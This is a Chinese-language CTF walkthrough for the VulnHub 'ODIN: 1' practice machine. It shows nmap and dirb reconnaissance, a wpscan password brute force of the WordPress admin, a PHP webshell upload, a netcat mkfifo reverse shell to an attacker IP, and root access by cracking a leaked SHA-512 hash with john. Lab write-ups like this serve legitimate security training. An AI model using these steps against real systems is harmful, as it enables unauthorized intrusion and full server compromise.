ODIN: 1靶机渗透
字数 887 2025-08-15 21:33:54
ODIN: 1靶机渗透教学文档
靶机基础信息
- 难度等级:简单
- 靶机链接:Vulnhub下载地址
- 发布日期:2020年11月21日
- 目标:获取root权限
- 网络配置:建议使用Host-only模式
环境准备
-
将靶机IP添加到hosts文件:
echo "192.168.56.106 odin" >> /etc/hosts -
确认网络连通性:
ping odin
信息收集阶段
1. 扫描网络发现靶机IP
使用nmap扫描本地网络:
nmap 192.168.56.0/24
发现靶机IP:192.168.56.106
2. 端口和服务扫描
详细扫描靶机开放端口和服务:
nmap -sV -p- -A -O 192.168.56.106
扫描结果:
- 80/tcp:Apache httpd 2.4.41 (Ubuntu)
漏洞探测与利用
1. 目录扫描
使用dirb进行目录扫描:
dirb http://odin/
发现关键路径:
- WordPress登录页面:/wp-login.php
2. WordPress爆破
使用wpscan进行密码爆破:
wpscan --url http://odin --usernames admin --passwords /usr/share/wordlists/rockyou.txt
获取凭证:
- 用户名:admin
- 密码:qwerty
3. 上传WebShell
- 登录WordPress后台
- 进入Plugins → Add New
- 上传精心构造的PHP WebShell(可使用哥斯拉生成)
4. 连接WebShell
- 找到上传的WebShell路径:
http://odin/wp-content/uploads/[上传文件名] - 使用哥斯拉连接WebShell
5. 反弹Shell
在WebShell中执行:
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc [攻击机IP] 1234 >/tmp/f
在攻击机监听:
nc -lvnp 1234
6. 建立交互式Shell
python3 -c "import pty;pty.spawn('/bin/bash')"
权限提升
1. 查找敏感文件
cd /var/www/html
cat wp-config.php
发现root用户加密密码:
$6$e9hWlnuTuxApq8h6$ClVqvF9MJa424dmU96Hcm6cvevBGP1OaHbWg//71DVUF1kt7ROW160rv9oaL7uKbDr2qIGsSxMmocdudQzjb01
2. 破解密码
- 将加密密码保存到passwd文件
- 使用john破解:
john passwd
获取root密码:jasmine
3. 提权
su root
输入密码:jasmine
4. 获取flag
cd /root
cat flag.txt
总结
- 信息收集:nmap扫描发现服务,dirb发现WordPress
- 漏洞利用:爆破WordPress弱密码,上传WebShell
- 权限提升:通过配置文件泄露的加密密码,破解后直接提权
关键点备忘
- WordPress默认登录路径:/wp-login.php
- 上传WebShell的常见位置:/wp-content/uploads/
- wp-config.php文件通常包含数据库凭证,有时也包含系统密码
- Linux密码哈希格式:\(6\)表示SHA512加密